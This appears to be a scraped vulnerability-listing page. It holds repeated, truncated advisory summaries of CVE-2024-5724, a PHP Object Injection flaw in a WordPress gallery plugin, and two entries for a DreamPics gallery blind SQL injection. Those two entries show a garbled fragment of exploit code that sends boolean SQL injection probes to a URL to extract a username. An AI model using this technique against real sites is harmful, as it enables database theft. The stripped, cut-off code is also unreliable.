CVE-2024-5724

The Photo Video Gallery Master plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.5.3 via deserialization of untrusted input 'PVGMallphotosdetails' parameter. This makes it possible for authenticated attackers, with Contributor-level access and abov...

CVE-2024-5724 Photo Video Gallery Master <= 1.5.3 - Authenticated (Contributor+) PHP Object Injection

The Photo Video Gallery Master plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.5.3 via deserialization of untrusted input 'PVGMallphotosdetails' parameter. This makes it possible for authenticated attackers, with Contributor-level access and abov...

PT-2024-37100 · WordPress · Photo Video Gallery Master

Name of the Vulnerable Software and Affected Versions: Photo Video Gallery Master plugin for WordPress versions up to, and including, 1.5.3 Description: The Photo Video Gallery Master plugin for WordPress is vulnerable to PHP Object Injection via deserialization of untrusted input PVGM all photos...

WordPress Photo Video Gallery Master plugin <= 1.5.3 - Authenticated PHP Object Injection vulnerability

Authenticated PHP Object Injection vulnerability discovered by Francesco Carlucci in WordPress Plugin Photo Video Gallery Master versions = 1.5.3...

DreamPics Photo/Video Gallery SQL Injection

xoron 1 $url = $argv1; $r = strlenfilegetcontents$url."+and+1=1--"; echo "\nExploiting:\n"; $w = strlenfilegetcontents$url."+and+1=0--"; $t = abs100-$w/$r100; echo "Username: "; for $i=1; $i $t-1 $count = $i; $i = 30; for $j = 1; $j $t-1 $laenge =...

DreamPics Photo/Video Gallery - Blind SQL Injection

xoron 1 $url = $argv1; $r = strlenfilegetcontents$url."+and+1=1--"; echo "\nExploiting:\n"; $w = strlenfilegetcontents$url."+and+1=0--"; $t = abs100-$w/$r100; echo "Username: "; for $i=1; $i $t-1 $count = $i; $i = 30; for $j = 1; $j $t-1 $laenge =...